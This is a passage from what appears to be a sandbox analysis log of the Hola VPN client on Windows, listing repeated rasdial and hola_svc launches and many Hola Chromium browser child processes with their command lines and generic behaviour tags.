C:\Windows\system32\rasdial.exerasdial2⤵PID:9392
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8268
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵PID:8644
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7416
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6008
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9080
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9464
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9784
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5732
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8076
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9572
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8152
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6856
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8524
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:372
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9288
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4748
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7204
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5324
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2392
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6284
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6192
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2296
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7900
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8020
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9772
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9640
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9244
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4136
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9412
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6808
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6440
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:3732
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7064
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9900
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7208
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8348
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:3232
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6680
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8272
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7032
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9576
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4496
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6528
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5560
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6604
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9124
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9992
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4592
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9188
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6100
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2916
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5988
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8124
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2380
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9080
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7348
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7224
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8688
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9624
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:996
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵PID:3396
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9240
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:224
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:556
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5000
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1112
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6876
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6388
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:372
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6760
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6888
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6004
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7728
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6156
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6304
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2396
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7524
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6268
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8900
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2012
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6320
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5844
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2336
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10092
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9868
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5064
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1796
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8772
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6088
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6992
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4176
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5004
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1764
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1676
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9508
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8228
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9728
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7980
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7928
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8044
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10216
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9072
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:872
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6456
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6164
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6372
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8060
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4948
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6184
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4880
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9188
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6100
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6624
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10036
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8848
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6016
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5424
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6008
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4512
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8700
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵PID:9016
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8156
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:3848
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5868
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5352
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6344
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9028
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6868
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9980
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8004
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5068
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4708
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6860
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2772
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:3044
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8340
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2288
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8548
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7280
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9164
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9468
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10112
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9716
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10236
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9184
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6240
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7784
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4820
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9920
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5436
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7208
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9988
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1120
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7516
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:428
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:3160
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9108
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9060
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5296
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2388
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2748
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9540
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7772
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:10080
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6644
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7368
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9912
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6576
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2788
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6276
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4496
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6260
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8828
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7504
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9640
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8632
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7384
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6252
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:7020
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵PID:4580
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:8036
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:2408
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1860
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:1720
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:5868
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:4088
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:9328
-
-
C:\Windows\system32\rasdial.exerasdial2⤵PID:6860
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4816
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:516
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1000
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --no-default-browser-check --component-updater=fast-update --start-maximized --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile"2⤵
- Executes dropped EXE
- Checks computer location settings
- Enumerates system info in registry
PID:6112 -
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler --monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile\Crashpad --annotation=plat=Win32 "--annotation=prod=Hola Browser" --annotation=ver=103.0.5060.114 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x6d5b0498,0x6d5b04a8,0x6d5b04b43⤵
- Executes dropped EXE
PID:3396 -
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile\Crashpad --annotation=plat=Win32 "--annotation=prod=Hola Browser" --annotation=ver=103.0.5060.114 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0xc77840,0xc77850,0xc7785c4⤵
- Executes dropped EXE
PID:1044
-
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵
- Executes dropped EXE
PID:4528
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=1928 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
PID:3876
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2128 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
PID:1080
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2948 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
PID:396
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2956 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
PID:180
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=3340 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Executes dropped EXE
- Checks computer location settings
PID:5752
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --mojo-platform-channel-handle=3348 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Executes dropped EXE
- Checks computer location settings
PID:2960
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3596 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:1456
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3952 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:980
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4076 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
PID:3404
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4232 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:2724
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2088 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵
- Executes dropped EXE
PID:1456
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3996 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵PID:2036
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4540 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:6052
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4712 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵PID:980
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=4744 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6152
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=3048 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6168
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=4748 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6188
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=4052 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6244
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=4776 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6288
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=5368 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6412
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5384 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6432
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=5744 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6748
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=5736 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6776
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=5732 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:6760
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4668 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:9132
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3384 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:9444
-
-
